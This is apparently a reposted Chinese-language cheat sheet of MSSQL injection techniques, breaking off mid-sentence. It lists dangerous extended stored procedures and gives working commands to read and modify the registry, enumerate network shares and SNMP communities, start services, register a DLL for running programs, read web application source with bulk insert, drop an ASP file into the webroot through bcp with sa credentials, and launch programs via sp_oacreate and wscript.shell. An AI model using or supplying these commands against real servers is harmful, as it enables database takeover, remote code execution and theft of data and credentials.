Mssql高級注入筆記II
2024-05-04 11:03:10
供稿:網友
一些sql擴展
xp_regaddmultistring
xp_regdeletekey 刪除鍵名
xp_regdeletevalue 刪除鍵值
xp_regenumkeys 枚舉
xp_regenumvalues
xp_regread 對于
xp_regremovemultistring
xp_regwrite 寫
xp_availablemedia 查看驅動器
xp_dirtree 看目錄
xp_enumdsn ODBC數據源
xp_loginconfig 一些服務器安全配置的信息
xp_makecab 打包,某些dbo權限先可做大用
xp_ntsec_enumdomains 枚舉域名相關信息
xp_terminate_process 終端進程和ip啦
xp_logininfo 當前登錄帳號
sp_configure 檢索數據庫中的內容(我覺得這個挺有用的)
sp_helpextendedproc 得到所有的存儲擴展
sp_who2 查詢用戶,他們登錄的主機,他們在數據庫中執行的操作等等
一些網絡信息
exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM/CurrentControlSet/Services/lanmanserver/parameters',
'nullsessionshares'
SNMP輔助網絡踩點
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEM/CurrentControlSet/Services/snmp/parameters/validcomm
unities'
開始一些系統服務,比如telnet,前提希望可以跑來admin或者一些系統密碼
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
Sp_addextendedproc 'xp_webserver','c:/temp/xp_foo.dll' 此擴展可以運行程序
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。簡單地創建這個表:
create table foo( line varchar(8000) )
然后執行bulk insert操作把文件中的數據插入到表中,如:
bulk insert foo from 'c:/inetpub/wwwroot/admin/inc.asp'
bcp "select * from text..foo" queryout c:/inetpub/wwwroot/runcommand.asp –c -Slocalhost –Usa –Pfoobar
'S'參數為執行查詢的服務器,'U'參數為用戶名,'P'參數為密碼,這里為'foobar'
SQL SERVER中提供了幾個內置的允許創建ActiveX自動執行腳本的存儲過程。這些腳本和運行在windows腳本解釋器下的腳本,或者ASP腳本程序一樣——他們使用VBScript或JavaScript書寫,他們創建自動執行對象并和它們交互。一個自動執行腳本使用這種方法書寫可以在Transact-SQL中做任何在ASP腳本中,或者WSH腳本中可以做的任何事情
使用'wscript.shell'對象建立了一個記事本的實例:
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'notepad.exe'
指定在用戶名后面來執行它:
